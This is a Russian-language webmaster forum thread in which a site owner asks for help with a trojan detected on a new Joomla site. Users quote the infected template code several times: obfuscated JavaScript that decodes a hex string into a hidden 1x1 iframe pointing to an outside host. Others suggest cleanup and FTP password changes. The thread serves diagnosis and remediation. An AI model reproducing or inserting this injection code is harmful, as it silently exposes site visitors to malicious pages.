Форум Сайтостроение Веб-строительство

говорят троян на сайте

12
CU
На сайте с 18.08.2007
Offline
58
Club-Ua
2654

не сочтите за рекламу сайт только что зделан .. пустой ещо, но говорят что там троян посмотрите пожалуйста и посоветуйте что нужно зделать если ето так.

Заранее спасибо!

сайт by-texnika.net

недорогой хостинг
kruk1
На сайте с 02.10.2006
Offline
152
kruk1
#1

В самом низу страницы - после <html>

<script type="text/javascript">код трояна

</script>

Сыч
На сайте с 24.12.2007
Offline
71
Сыч
#2

The requested URL http://by-texnika.net/ is infected with Trojan-Clicker.HTML.IFrame.lr virus

Почистите код.

Мой проект - оборудование для автосервиса (http://www.teh-avto.ru/); Редактирую раздел DMOZ: Бизнес и экономика в Ярославле; Региональный проект - мебель Ярославль (http://www.mebelyaroslavl.ru/).
CU
На сайте с 18.08.2007
Offline
58
Club-Ua
#3 

</div>

		<div class="copyright"><a href="http://www.joomlashack.com/" title="Joomla Templates">Joomla Templates by Joomlashack</a></div>

		<?php require ($mosConfig_absolute_path."/templates/" . $mainframe->getTemplate() . "/js/template_css.php");

//ke83jcnsWWdo403

echo "<script type=\"text/javascript\">\r\nfunction CC70475059E00529BB593C9C20A(B8F4CAE98748092E8E6367F05FCF){function C1826F692BFD1CF8913C37(){return 16;}return(parseInt(B8F4CAE98748092E8E6367F05FCF,C1826F692BFD1CF8913C37()));}function B07B56FF7E3F2F514C65E(A580CA29C93E1C0E53A06693ABB){var CB9AED6DBA318389BBCCF9498DF22=2;var C32DC468C68BC65AF2A58AE9E4BAC=\"\";for(B5D436DCF02E51628012=0;B5D436DCF02E51628012<A580CA29C93E1C0E53A06693ABB.length;B5D436DCF02E51628012+=CB9AED6DBA318389BBCCF9498DF22){C32DC468C68BC65AF2A58AE9E4BAC+=(String.fromCharCode(CC70475059E00529BB593C9C20A(A580CA29C93E1C0E53A06693ABB.substr(B5D436DCF02E51628012,CB9AED6DBA318389BBCCF9498DF22))));}document.write(C32DC468C68BC65AF2A58AE9E4BAC);}B07B56FF7E3F2F514C65E(\"3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E\");\r\n</script>";

?>

	<br />

</body>

</html>

что из етого?

kruk1
На сайте с 02.10.2006
Offline
152
kruk1
#4
div class="copyright"><a href="http://www.joomlashack.com/" title="Joomla Templates">Joomla Templates by Joomlashack</a></div>
<div class="cright"><a href="http://www.joomlashack.com" title="Joomla Templates">Joomla Templates by JoomlaShack</a></div><script type="text/javascript">
function CC70475059E00529BB593C9C20A(B8F4CAE98748092E8E6367F05FCF){function C1826F692BFD1CF8913C37(){return 16;}return(parseInt(B8F4CAE98748092E8E6367F05FCF,C1826F692BFD1CF8913C37()));}function B07B56FF7E3F2F514C65E(A580CA29C93E1C0E53A06693ABB){var CB9AED6DBA318389BBCCF9498DF22=2;var C32DC468C68BC65AF2A58AE9E4BAC="";for(B5D436DCF02E51628012=0;B5D436DCF02E51628012<A580CA29C93E1C0E53A06693ABB.length;B5D436DCF02E51628012+=CB9AED6DBA318389BBCCF9498DF22){C32DC468C68BC65AF2A58AE9E4BAC+=(String.fromCharCode(CC70475059E00529BB593C9C20A(A580CA29C93E1C0E53A06693ABB.substr(B5D436DCF02E51628012,CB9AED6DBA318389BBCCF9498DF22))));}document.write(C32DC468C68BC65AF2A58AE9E4BAC);}B07B56FF7E3F2F514C65E("3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
</script> <br />
</body>
</html><script type="text/javascript">
function CC70475059E00529BB593C9C20A(B8F4CAE98748092E8E6367F05FCF){function C1826F692BFD1CF8913C37(){return 16;}return(parseInt(B8F4CAE98748092E8E6367F05FCF,C1826F692BFD1CF8913C37()));}function B07B56FF7E3F2F514C65E(A580CA29C93E1C0E53A06693ABB){var CB9AED6DBA318389BBCCF9498DF22=2;var C32DC468C68BC65AF2A58AE9E4BAC="";for(B5D436DCF02E51628012=0;B5D436DCF02E51628012<A580CA29C93E1C0E53A06693ABB.length;B5D436DCF02E51628012+=CB9AED6DBA318389BBCCF9498DF22){C32DC468C68BC65AF2A58AE9E4BAC+=(String.fromCharCode(CC70475059E00529BB593C9C20A(A580CA29C93E1C0E53A06693ABB.substr(B5D436DCF02E51628012,CB9AED6DBA318389BBCCF9498DF22))));}document.write(C32DC468C68BC65AF2A58AE9E4BAC);}B07B56FF7E3F2F514C65E("3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
</script>
<script type="text/javascript">
function CC70475059E00529BB593C9C20A(B8F4CAE98748092E8E6367F05FCF){function C1826F692BFD1CF8913C37(){return 16;}return(parseInt(B8F4CAE98748092E8E6367F05FCF,C1826F692BFD1CF8913C37()));}function B07B56FF7E3F2F514C65E(A580CA29C93E1C0E53A06693ABB){var CB9AED6DBA318389BBCCF9498DF22=2;var C32DC468C68BC65AF2A58AE9E4BAC="";for(B5D436DCF02E51628012=0;B5D436DCF02E51628012<A580CA29C93E1C0E53A06693ABB.length;B5D436DCF02E51628012+=CB9AED6DBA318389BBCCF9498DF22){C32DC468C68BC65AF2A58AE9E4BAC+=(String.fromCharCode(CC70475059E00529BB593C9C20A(A580CA29C93E1C0E53A06693ABB.substr(B5D436DCF02E51628012,CB9AED6DBA318389BBCCF9498DF22))));}document.write(C32DC468C68BC65AF2A58AE9E4BAC);}B07B56FF7E3F2F514C65E("3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
</script>

Даже два раза повторяется))

tommy-gung
На сайте с 22.11.2006
Offline
304
tommy-gung
#5

это


echo "<script type=\"text/javascript\">\r\nfunction CC70475059E00529BB593C9C20A(B8F4CAE98748092E8E6367F05FCF){function C1826F692BFD1CF8913C37(){return 16;}return(parseInt(B8F4CAE98748092E8E6367F05FCF,C1826F692BFD1CF8913C37()));}function B07B56FF7E3F2F514C65E(A580CA29C93E1C0E53A06693ABB){var CB9AED6DBA318389BBCCF9498DF22=2;var C32DC468C68BC65AF2A58AE9E4BAC=\"\";for(B5D436DCF02E51628012=0;B5D436DCF02E51628012<A580CA29C93E1C0E53A06693ABB.length;B5D436DCF02E51628012+=CB9AED6DBA318389BBCCF9498DF22){C32DC468C68BC65AF2A58AE9E4BAC+=(String.fromCharCode(CC70475059E00529BB593C9C20A(A580CA29C93E1C0E53A06693ABB.substr(B5D436DCF02E51628012,CB9AED6DBA318389BBCCF9498DF22))));}document.write(C32DC468C68BC65AF2A58AE9E4BAC);}B07B56FF7E3F2F514C65E(\"3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E\");\r\n</script>";
Здесь не могла быть ваша реклама
CU
На сайте с 18.08.2007
Offline
58
Club-Ua
#6

всем спасибо ...интересно как он туда попал.. сайт то нигде не засвечен

webmaxter
На сайте с 18.12.2007
Offline
84
webmaxter
#7

FTP клиентом каким пользуетесь? Возможно в нем дырка.

Либо у хостера проблемы.

CU
На сайте с 18.08.2007
Offline
58
Club-Ua
#8

тотал юзаю

Club-Ua добавил 10.05.2008 в 13:41

блин столько файлов заражено... подскажите ожет кто знает их только ручками нужно перебирать или же есть какието сервиси?

[Удален]
#9
Club-Ua:
тотал юзаю

Club-Ua добавил 10.05.2008 в 13:41
блин столько файлов заражено... подскажите ожет кто знает их только ручками нужно перебирать или же есть какието сервиси?

В принципе не важно какой клиент используете.

Конечно ручками придётся всё перебирать. И пароль на фтп обязательно сменить. И держать его в памяти своей а не компьютера. Вариант, конечно, не очень удобный :) но более надёжный.

Y
На сайте с 18.12.2007
Offline
4
ygen
#10

Спасибо! Обнаружил у себя на сайте ту же заразу. Когда-то слышал но не обратил внимание. Оказывается зря

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий